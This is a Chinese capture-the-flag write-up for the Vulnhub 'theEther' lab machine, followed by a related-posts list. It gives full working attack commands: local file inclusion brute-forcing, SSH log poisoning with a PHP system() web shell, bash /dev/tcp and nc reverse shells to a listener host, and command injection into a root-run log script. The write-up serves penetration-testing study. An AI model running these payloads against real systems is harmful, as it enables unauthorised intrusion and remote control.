Vulnhub-theEther
一、IP探测
arp-scan -l
靶机IP为172.20.10.3
二、端口扫描
nmap -sV -T4 -p- -A 172.20.10.3
只开放了80端口。
三、端口分析(80端口)
这里有一个参数,可以包含本地文件。这是一个可以利用的点。其他的就没有找到什么了。
四、漏洞利用
这个参数可以爆破一下后台文件。
可以先用dirb试试。
dirb http://172.20.10.3
扫到了一些路径但基本都是index,没什么用。
要用参数爆破,利用burpsuite的intruder模块爆破file参数。
选用LFI的字典
字典链接:https://github.com/danielmiessler/SecLists
字典名为LFI-Jhaddix.txt
前几个是访问成功的,可以看到是日志文件。
auth.log的状态码是302,有重定向。点击查看数据包。
可以看到日志,因此可以考虑日志注入,也就是通过执行命令然后在日志中查看操作及对应结果。
先通过ssh注入一段php代码
ssh '<?php system($_GET[cmd]);?>'@172.20.10.3
密码随便填
然后查看日志
可以通过curl命令查询。
curl http://http://172.20.10.3/?file=/var/log/auth.log
发现了这条ssh连接记录,但是用户名被隐藏了。
curl 'http://172.20.10.3/index.php?file=/var/log/auth.log&cmd=ls'
看到了ls的结果,说明可以RCE。
构造payload反弹shell。
#新开一个终端然后输入以下命令
nc -lvvp 1234
#即监听1234端口
在原终端中输入
curl 'http://172.20.10.3/index.php?file=/var/log/auth.log&cmd=bash -i >& /dev/tcp/172.20.10.2/1234 0>&1'
需要url编码。
curl 'http%3A%2F%2F172.20.10.3%2Findex.php%3Ffile%3D%2Fvar%2Flog%2Fauth.log%26cmd%3Dbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.20.10.2%2F1234%200%3E%261'
还是不行,可能是这种反弹方法有问题。换一个反弹方法
mknod backpipe p && nc 172.20.10.2 1234 0<backpipe | /bin/bash 1>backpipe
进行url编码然后加上curl命令
curl 'http://172.20.10.3/index.php?file=/var/log/auth.log&cmd=mknod+backpipe+p+%26%26+nc+172.20.10.2+1234+0%3Cbackpipe+%7C+%2Fbin%2Fbash+1%3Ebackpipe'
后续由于笔者的环境出现了问题,换到了另一台电脑上进行了后续操作。没有截图,只能口述了。。。
后续打开xxxlogauditorxxx.py的脚本,发现特别长。
尝试运行一下
输入命令
/var/log/auth.log | ls /root
看到了一个flag.png的文件,复制到公共目录temp用wget命令下载下来。
打开发现不是,用cat命令查看看到base64编码,解码一下就是flag。
Vulnhub-theEther相关推荐
- Vulnhub靶场题解
Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行 ...
- VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE
VulnHub渗透测试实战靶场 - THE ETHER: EVILSCIENCE 环境下载 THE ETHER: EVILSCIENCE靶机搭建 渗透测试 信息搜集 漏洞挖掘 getshell 提权 ...
- 渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介 名称:Android4 操作系统:Android v4.4 标志:/data/root/(在此目录中) 等级:初学者. 下载链接:Android4:https://downl ...
- Vulnhub靶机渗透之 RAVEN: 1
目录 Description 网卡信息 信息收集 主机发现 主机存活扫描 端口扫描 网站信息 网站首页 nikto 报告 service 页面 wordpress 渗透过程 SSH 爆破 Hydr 命 ...
- [网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步.前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可 ...
- 【Vulnhub靶机系列】DC2
基本信息 Kali:192.168.61.145 DC2:192.168.61.162 实验过程 在Kali中先进行内网探活 sudo arp-scan --interface eth0 192.16 ...
- 【Vulnhub靶机系列】DC1
基本信息 Kali: 192.168.56.116 DC1: 192.168.56.115 实验过程 先在Kali中使用arp-scan进行主机探活 sudo arp-scan --interface ...
- 利用Vulnhub复现漏洞 - JBoss JMXInvokerServlet 反序列化漏洞
JBoss JMXInvokerServlet 反序列化漏洞 Vulnhub官方复现教程 漏洞原理 复现过程 启动环境 端口设置 浏览器设置 BurpSuit设置 复现漏洞 序列化数据生成 发送POC ...
- 靶场练习第二十二天~vulnhub靶场之Momentum-2
一.准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端 ...
- 靶场练习第二十五天~vulnhub靶场之Raven-2
一.准备工作 kali和靶机都选择NAT模式(kali与靶机同网段) 1.靶场环境 下载链接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机 ...
最新文章
- 阿里数学竞赛可以报名了!奖金增加到400万元,题目面向大众公开征集
- 医失眠灵验方--五味子50g 茯神50g 合欢花15g 法半夏15g
- 【GDKOI2003】最大公共子串
- cvtcolor python opencv_蔡徐坤教你用OpenCV实现素描效果
- 笔记本安装win7和arch linux双系统+xfce4桌面
- java获取xlsx某列数据_Java读取Excel指定列的数据详细教程和注意事项
- BroadLeaf项目搜索功能改进
- 计算机组成加速比例题,计算机体系结构大题预测
- spring boot 邮件端口_不会吧,SpringBoot还能发送邮件发送邮件?快来看看如何操作吧...
- 谷歌免费域名邮箱申请全解
- linux和windows截图软件下载,【教程】数字菌教你从windows过渡到linux之软件的替换...
- 我们是如何认识这个世界的呢
- 上传Android library到JitPack
- 程序员电脑(减少辐射)(¥37)
- Unittest-单元测试3
- origin如何绘制双y轴曲线_origin怎样画双y轴 看完恍然大悟
- 【期末复习】计算机网络 谢希仁版(六)应用层
- 算法 + 算法 = 新算法
- FPGA 之 SOPC 系列(九)SOPC 补充:altera与xilinx对比
- 计算机图形学(三)——画一个矩形